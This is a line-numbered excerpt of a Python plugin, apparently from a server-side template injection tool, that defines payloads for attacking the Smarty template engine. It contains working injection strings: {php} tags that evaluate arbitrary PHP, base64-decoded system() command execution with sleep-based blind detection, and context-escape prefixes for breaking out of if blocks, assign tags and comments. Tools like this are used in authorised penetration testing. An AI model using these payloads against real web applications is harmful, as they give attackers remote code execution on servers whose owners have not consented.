(self)
| 8 | class Smarty(php.Php): |
| 9 | |
| 10 | def init(self): |
| 11 | |
| 12 | self.update_actions({ |
| 13 | 'render' : { |
| 14 | 'render': '%(code)s', |
| 15 | 'header': '{%(header)s}', |
| 16 | 'trailer': '{%(trailer)s}', |
| 17 | 'test_render': """{%(r1)s}{*%(comment)s*}{%(r2)s}""" % { |
| 18 | 'r1' : rand.randints[0], |
| 19 | 'comment' : rand.randints[1], |
| 20 | 'r2' : rand.randints[2] |
| 21 | }, |
| 22 | 'test_render_expected': '%(r1)s%(r2)s' % { |
| 23 | 'r1' : rand.randints[0], |
| 24 | 'r2' : rand.randints[2] |
| 25 | } |
| 26 | }, |
| 27 | 'evaluate' : { |
| 28 | 'call': 'render', |
| 29 | 'evaluate': """{php}%(code)s{/php}""" |
| 30 | }, |
| 31 | 'evaluate_blind' : { |
| 32 | 'call': 'inject', |
| 33 | 'evaluate_blind': """{php}$d="%(code_b64)s";eval("return (" . base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)) . ") && sleep(%(delay)i);");{/php}""" |
| 34 | }, |
| 35 | 'execute_blind' : { |
| 36 | 'call': 'inject', |
| 37 | 'execute_blind': """{php}$d="%(code_b64)s";system(base64_decode(str_pad(strtr($d, '-_', '+/'), strlen($d)%%4,'=',STR_PAD_RIGHT)). " && sleep %(delay)i");{/php}""" |
| 38 | }, |
| 39 | |
| 40 | }) |
| 41 | |
| 42 | self.set_contexts([ |
| 43 | |
| 44 | # Text context, no closures |
| 45 | { 'level': 0 }, |
| 46 | |
| 47 | { 'level': 1, 'prefix': '%(closure)s}', 'suffix' : '{', 'closures' : php.ctx_closures }, |
| 48 | |
| 49 | # {config_load file="missing_file"} raises an exception |
| 50 | |
| 51 | # Escape Ifs |
| 52 | { 'level': 5, 'prefix': '%(closure)s}{/if}{if 1}', 'suffix' : '', 'closures' : php.ctx_closures }, |
| 53 | |
| 54 | # Escape {assign var="%s" value="%s"} |
| 55 | { 'level': 5, 'prefix': '%(closure)s var="" value=""}{assign var="" value=""}', 'suffix' : '', 'closures' : php.ctx_closures }, |
| 56 | |
| 57 | # Comments |
| 58 | { 'level': 5, 'prefix': '*}', 'suffix' : '{*' }, |
| 59 | |
| 60 | ]) |
nothing calls this directly
no test coverage detected